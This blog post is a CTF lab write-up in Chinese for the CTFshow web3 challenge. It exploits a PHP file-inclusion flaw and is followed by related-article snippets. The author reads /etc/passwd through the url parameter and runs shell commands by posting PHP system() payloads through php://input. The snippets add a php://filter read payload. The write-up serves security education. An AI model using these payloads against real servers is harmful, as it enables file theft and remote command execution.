CTFshow web3 菜鸡刷题记录

最新推荐文章于 2024-05-24 08:16:45 发布
最新推荐文章于 2024-05-24 08:16:45 发布
阅读量2.1k 收藏 5
点赞数 9
分类专栏: CTFshow 文章标签: php 安全 经验分享 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43039823/article/details/118959895
版权

打开题目发现整个界面只有一句话,F12查看源码之后无果, 根据这个格式

 

<?php include($_GET['url']);?>  后想到可能会存在文件包含漏洞。

因为常见的导致文件包含漏洞的函数有:“PHP:include(),  include_once(), require(), require_once()等”,

因为开发人员往往都希望代码相对灵活,所以会将()被包含的文件设置为变量从而实现灵活的调动,但这也导致了从客户端可以调用一个恶意文件导致包含漏洞。

既然已经有所怀疑,那么就试着去证明一下。

给url赋值,?url=/etc/passwd

/etc/passwd 文件中,每一行都记录着用户的各方面的属性,口令,而现在的系统中,口令不直接保存在passwd文件中,而将/etc/shadow作为真正的口令文件。
执行,界面显示如此。证实确实存在文件包含漏洞

 

url中构建?url=php://input 后burp抓包,发送至rp(重发器)界面,在body上输入

<?php system("ls")?>

 发送执行!

 诶嘿,发现界面出现的新的东西,分别是 ctf_go_go_go和index,php (十分礼貌地回避了index.php)直接输入指令

<?php system("cat ctf_go_go_go")?>

执行!右侧出现flag,游戏结束

ctfshow{95b174f4-aeb8-4521-9db8-be4261f36227}

是Enterprise!
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
动态web书城菜鸡制作
06-19
本人练手
移动web开发之菜鸡问卷.rar
12-02
这个项目的代码 大致的想法就是前端把数据提交给后台,然后利用框架直接封装成一个对象类 再然后就把这个对象类每一条处理一下存在另一个对象类中(这个对象是用来放调查问卷的结果)偷懒直接把这个对象放在了...
PHP文件包含漏洞
Jim的博客
08-17 1277
PHP的文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。 文件包含分为本地文本包含(local file include)和远程文件包含(remote file include) 文件包含函数有:include(),include_once(),require()和require_once() 1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和ca
文件包含漏洞(include)-学习笔记
小龙在线
08-21 5637
简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 PHP Stream(流) 属性 支持 受限于 allow_url_fopen NO 受限于allow_url_include 仅 php://input、 php://s
【CTF Web】CTFShow web3 Writeup(SQL注入+PHP+UNION注入)
最新发布
HEX9CF的技术博客
05-24 413
1管理员被狠狠的教育了,所以决定好好修复一番。这次没问题了。
PHP文件包含漏洞总结
坚持硬核
10-07 3273
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
ctfshow-Web入门-29~36wp
yutianovo的博客
09-05 1920
Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数 了解 eval函数之后 传入 ?c=echo "Y2my";?>ctf <?php system('ls');
CTFshow web入门文件包含
qq_39948058的博客
10-04 2082
前言:看题 web78: if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 发现include是文件包含没错了,伪协议读取出来就可以了 exp:?file=php://filter/convert.base64-encode/resource=flag.php web79: ...
leetcode分类-LeetCode::scroll:刷题记录
06-30
leetcode ...菜鸡刷题记录,下面的博文是我做题的一些题解,欢迎各位大佬来纠错 下面的内容可能并不完全,更多题解可以查看我的 类别 数量 地址 36 91 33 22 32 96 37 97 12 53 24 11 17 4 1 10 4 5
PGRGame菜鸡版.zip
03-28
1. `.classpath`:这是Eclipse IDE的一个配置文件,用于记录项目中类路径的设置,包括JRE系统库、项目依赖库等。在Java开发中,正确配置.classpath是确保项目能够正常编译和运行的关键。 2. `.project`:这是...
d3.js 好看的饼图,多层边框,装饰点
04-24
**标题与描述解析** 本文将深入探讨如何使用d3.js库创建美观且具有多层边框和装饰点的饼图。d3.js是一个强大的JavaScript库,专为数据可视化设计,它允许开发者创建复杂的动态图表和图形。在"好看的饼图,多层边框...
Nginx配置SSI
手可摘星河
04-29 137
一.什么是SSISSI:ServerSideInclude,是一种基于服务端的网页制作技术,大多数(尤其是基于Unix平台)的web服务器如NetscapeEnterpriseServer等均支持SSI命令。它的工作原因是:在页面内容发送到客户端之前,使用SSI指令将文本、图片或代码信息包含到网页中。对于在多个文件中重复出现内容,使用SSI是一种简便的方法,将内容存入一个包含文件...
php include传参数,php include()带参数实现方法
weixin_42157188的博客
03-10 1100
inlcude带参数这个问题以前我没成功,今天看到一文章果断搞了了,如我可以这样include('a.php?site=www.phprm.com')然后在调用a.php页面可直接$_GET['a'];获取了.具体方法详解举例:假设在 index.php 中需要调用 inc.php?para=3 ,inc.php实例代码如下:echo $_GET['para']; ?>下面的写法是无法得到正...
CTFshow web入门——命令执行
热门推荐
小元砸的博客
01-29 1万+
web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);
CTFShow re3
Mintind的博客
12-01 1527
CTFShow re3解题记录
CTFSHOW系列-web3(信息收集-抓包看响应头)
siu~
11-22 473
CTFSHOW系列解题思路
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 1837
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
菜鸡mac地址扫描器
12-30
菜鸡MAC地址扫描器是一种针对局域网中的网络设备进行扫描的工具。它的主要功能是识别和展示网络中各个设备的MAC地址。 菜鸡MAC地址扫描器相对于其他高级的网络工具来说,功能相对简单,易于使用。它可以通过扫描局域网中的所有IP地址,获取与这些地址关联的设备的MAC地址。通过这个方式,用户可以清楚地了解局域网内部的设备布局和连接情况。 菜鸡MAC地址扫描器的界面直观且易于操作,用户只需输入扫描起始IP和结束IP,点击启动扫描按钮,软件会自动在指定的IP段内进行扫描,同时显示每个IP地址对应的设备MAC地址、IP地址、设备名称等信息。扫描结果会以列表的形式展示,用户可以根据需求进行排序和筛选。 除了显示MAC地址,菜鸡MAC地址扫描器还可以提供一些附加功能,比如从MAC地址推测设备类型、厂商信息等。这些信息对于网络管理和安全检查也有一定的参考意义。 尽管菜鸡MAC地址扫描器功能相对简单,但对于一些小型局域网的设备管理来说,已经足够满足基本需求。同时,使用菜鸡MAC地址扫描器可以避免使用复杂的高级工具,更加方便快捷地获取所需的MAC地址信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值